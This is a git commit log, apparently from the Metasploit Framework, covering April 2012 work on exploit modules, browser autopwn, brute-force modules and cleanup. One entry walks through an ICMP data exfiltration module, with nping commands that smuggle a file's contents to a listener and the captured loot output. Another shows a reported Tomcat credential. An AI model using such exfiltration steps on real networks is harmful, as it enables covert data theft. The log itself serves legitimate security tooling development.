3cb7cbe994
Adding another ref and a disclosuredate to mihi's XPI module
...
Calling the disclosure date 2007 since TippingPoint published a blog
post back then about this XPI confirm-and-install vector.
2012-04-10 13:59:21 -05:00
0e1fff2c4b
Change the output style to comply with egyp7's expectations.
2012-04-10 13:42:52 -05:00
28534d5f6e
Merge branch 'rapid7' into bap-refactor
2012-04-10 12:42:27 -06:00
76c12fe7e6
Whitespace cleanup
2012-04-10 13:22:10 -05:00
705cf41858
Add firefox_xpi_bootstrapped_addon exploit
...
This is similar to java_signed_applet as it does not exploit a vulnerability, but
hope that the user will trust the addon.
2012-04-10 13:39:54 +02:00
a9d733f9fe
Fix pack order
2012-04-09 21:21:42 -05:00
2de0c801d9
Add vulnerable version numbers to the description
2012-04-09 14:41:42 -06:00
2c473e3cdd
Fix up koyo login
2012-04-09 15:07:47 -05:00
246ebca940
added module for CVE-2012-0198
2012-04-09 20:45:27 +02:00
a26e844ce5
Merge pull request #318 from wchen-r7/dolibarr_login
...
Add an aux module to brute force Dolibarr's login interface
2012-04-09 09:20:48 -07:00
bef12478fc
Merge branch 'bap-refactor' of https://github.com/jlee-r7/metasploit-framework into jlee-r7-bap-refactor
2012-04-09 09:58:22 -05:00
037fbf655e
Standardize the print format for modules used by browser autopwn
2012-04-09 01:57:50 -06:00
b38933328f
Send exploits that are not assocated with any browser to all of them
2012-04-09 01:53:57 -06:00
3ca440089e
Add checks for .NET requisites
...
Also standardizes print_status format to look nicer with lots of cilents
2012-04-09 01:23:44 -06:00
a6b106e867
Remove autopwn support for enjoysapgui_comp_download
...
No automatic targeting, the payload doesn't execute immediately, and
requires the browser be running as Admin. Bascially just not a great
candidate for being run automatically.
2012-04-09 01:05:37 -06:00
409ba3139b
Add bap checks for blackice exploit
2012-04-09 00:50:04 -06:00
5fefb47b7f
Some cosmetic changes
2012-04-09 01:43:20 -05:00
95dbb8a818
Merge branch 'snort-dce-rpc' of https://github.com/carmaa/metasploit-framework into carmaa-snort-dce-rpc
2012-04-09 00:17:44 -05:00
da1cb2b81d
ActiveX controls require IE
2012-04-08 22:07:09 -06:00
9cec9639c7
Add an aux module to brute force Dolibarr's login interface
2012-04-08 18:16:38 -05:00
f520af036f
Move next_exploit() onto window object so it's accessible everywhere
...
I swear I committed this before, not sure what happened.
2012-04-08 17:11:15 -06:00
ce0de02a2a
Modified for 8-space tabs
2012-04-08 16:09:28 -04:00
89c1894e07
Minor formatting changes, tabs etc. and comments for clarity
2012-04-08 15:45:23 -04:00
51bdfe14fd
2012, not 2011, oops
2012-04-08 13:21:37 -05:00
24478e9eb5
Add Dolibarr ERP & CRM Command Injection Exploit
2012-04-08 13:20:22 -05:00
05eba0ab4c
Cosmetic changes, mostly :-)
2012-04-07 14:47:23 -05:00
00ff2e3dc1
Merge branch 'CVE-2012-1195_thinkmanagement' of https://github.com/juanvazquez/metasploit-framework into juanvazquez-CVE-2012-1195_thinkmanagement
2012-04-07 14:41:19 -05:00
938d5d0a75
added references for cve-2012-1196
2012-04-07 20:22:59 +02:00
ee7bce5995
deletion of the ASP script
2012-04-07 20:19:45 +02:00
dfe2bbc958
Use rport for modicon_password recovery, not 21.
2012-04-07 13:03:43 -05:00
8761d39190
exploit module added for CVE-2012-1195
2012-04-07 19:04:17 +02:00
b2e0acd92a
Tidied up the exploit
2012-04-06 20:41:54 -04:00
4e955e5870
replace spaces with tabs
2012-04-06 10:45:10 -05:00
67e6c7b850
tomcat_mgr_deploy may report successful creds
...
Using following code for 'check' as 'exploit':
report_auth_info(
:host => rhost,
:port => rport,
:sname => (ssl ? "https" : "http"),
:user => datastore['BasicAuthUser'],
:pass => datastore['BasicAuthPass'],
:proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}",
:active => true
)
Resulting in:
Credentials
===========
host port user pass type active?
---- ---- ---- ---- ---- -------
192.168.x.xxx 8080 tomcat s3cret password true
2012-04-06 10:45:10 -05:00
461352f24f
Don't need to require net/ftp anymore
...
Nothing actually used it anyway.
2012-04-06 10:35:28 -05:00
8c3f707c93
ICMP Data Exfiltration Module
...
Tested with nping for data exfiltration (client-side script is suggested to get the full functionality out of the module).
Walkthrough
============
== Client ==
============
> nping --icmp 10.0.0.138 --data-string "BOF:test.txt" -c1
Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.5860s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=42953 iplen=40
RCVD (1.0580s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=3551 iplen=33
Max rtt: 13.000ms | Min rtt: 13.000ms | Avg rtt: 13.000ms
Raw packets sent: 1 (54B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.46000s | Tx bytes/s: 117.39 | Tx pkts/s: 2.17
Rx time: 1.46000s | Rx bytes/s: 22.60 | Rx pkts/s: 0.68
Nping done: 1 IP address pinged in 2.05 seconds
> nping --icmp 10.0.0.138 --data-string "test text...." -c1
Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.6230s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=38228 iplen=41
RCVD (1.0540s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=14168 iplen=33
Max rtt: 10.000ms | Min rtt: 10.000ms | Avg rtt: 10.000ms
Raw packets sent: 1 (55B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.42200s | Tx bytes/s: 130.33 | Tx pkts/s: 2.37
Rx time: 1.42200s | Rx bytes/s: 23.21 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.04 seconds
> nping --icmp 10.0.0.138 --data-string " test text.... again" -c1
Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:05 W. Europe Daylight Time
SENT (0.6260s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=12163 iplen=48
RCVD (1.0580s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=60632 iplen=33
Max rtt: 12.000ms | Min rtt: 12.000ms | Avg rtt: 12.000ms
Raw packets sent: 1 (62B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.42100s | Tx bytes/s: 147.27 | Tx pkts/s: 2.38
Rx time: 1.42200s | Rx bytes/s: 23.21 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.05 seconds
> nping --icmp 10.0.0.138 --data-string "EOF" -c1
Starting Nping 0.5.61TEST5 ( http://nmap.org/nping ) at 2012-04-04 15:06 W. Europe Daylight Time
SENT (0.6420s) ICMP 10.0.0.148 > 10.0.0.138 Echo request (type=8/code=0) ttl=64 id=30459 iplen=31
RCVD (1.0970s) ICMP 10.0.0.138 > 10.0.0.148 Echo reply (type=0/code=0) ttl=32 id=55188 iplen=33
Max rtt: 24.000ms | Min rtt: 24.000ms | Avg rtt: 24.000ms
Raw packets sent: 1 (45B) | Rcvd: 1 (33B) | Lost: 0 (0.00%)
Tx time: 0.43100s | Tx bytes/s: 104.41 | Tx pkts/s: 2.32
Rx time: 1.43100s | Rx bytes/s: 23.06 | Rx pkts/s: 0.70
Nping done: 1 IP address pinged in 2.07 seconds
============
== SERVER ==
============
msf auxiliary(icmp_exfil) > rerun
[*] Reloading module...
[+] ICMP Listener started on eth0 (10.0.0.138). Monitoring for trigger packet containing ^BOF:
[*] 2012-04-04 15:05:31 +0200: SRC:10.0.0.148 ICMP (type 8 code 0) DST:10.0.0.138
[+] Beginning capture of test.txt data
[*] Received 18 bytes of data from 10.0.0.148
[*] Received 20 bytes of data from 10.0.0.148
[*] 38 bytes of data recevied in total
[+] End of File received. Saving test.txt to loot
[+] Incoming file test.txt saved to loot
[+] Loot filename: /root/.msf4/loot/20120404150603_default_10.0.0.138_icmp_exfil_340768.txt
[*] Stopping ICMP listener on eth0 (10.0.0.138)
[-] Auxiliary interrupted by the console user
[*] Auxiliary module execution completed
msf auxiliary(icmp_exfil) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
10.0.0.138 icmp_exfil test.txt text/xml ICMP Exfiltrated Data /root/.msf4/loot/20120404150603_default_10.0.0.138_icmp_exfil_340768.txt
2012-04-06 13:45:10 +02:00
56b10d4d23
Merge branch 'CVE-2012-0270_csound_getnum_bof' of https://github.com/juanvazquez/metasploit-framework into juanvazquez-CVE-2012-0270_csound_getnum_bof
2012-04-06 02:28:26 -05:00
68c81e3ae0
Add OSVDB-80661 TRENDnet SecurView ActiveX BoF
2012-04-06 02:26:04 -05:00
b184a6dc5c
Exploit for Snort CVE-2006-5276 on Windows
2012-04-05 19:46:56 -04:00
9c8e6ac9da
Ruby 1.8 compat for the SCADA modules.
...
But really, you should be using Ruby 1.9 by now.
2012-04-05 17:05:03 -05:00
14e3cd75dc
Revert "tomcat_mgr_deploy may report successful creds"
...
This reverts commit 937f8f035a
2012-04-05 16:17:06 -05:00
5c6856539e
.idea dir deleted
2012-04-05 22:46:43 +02:00
955de5a68c
comment fixed
2012-04-05 22:46:13 +02:00
c5f73d3d7a
added module for CVE-2012-0270_csound_getnum_bof
2012-04-05 22:35:42 +02:00
0c3f1aab77
Tell the user what actually went wrong when migrate.rb fails
2012-04-05 11:49:03 -06:00
14d9953634
Adding DigitalBond SCADA modules
2012-04-05 12:35:48 -05:00
eb39b5f6aa
Msftidy on netop
2012-04-05 10:33:57 -05:00
8628991b1d
Merge pull request #305 from jlee-r7/bap-refactor
...
Bap refactor
2012-04-05 08:02:43 -07:00
937f8f035a
tomcat_mgr_deploy may report successful creds
2012-04-05 11:09:56 +02:00
40ab362e1c
Store host details in the target cache
...
This allows us to maintain a connection between the client and the
operating system/host where it's running.
Also fixes a counting problem for modules actually started.
2012-04-05 01:33:07 -06:00
Tod Beardsley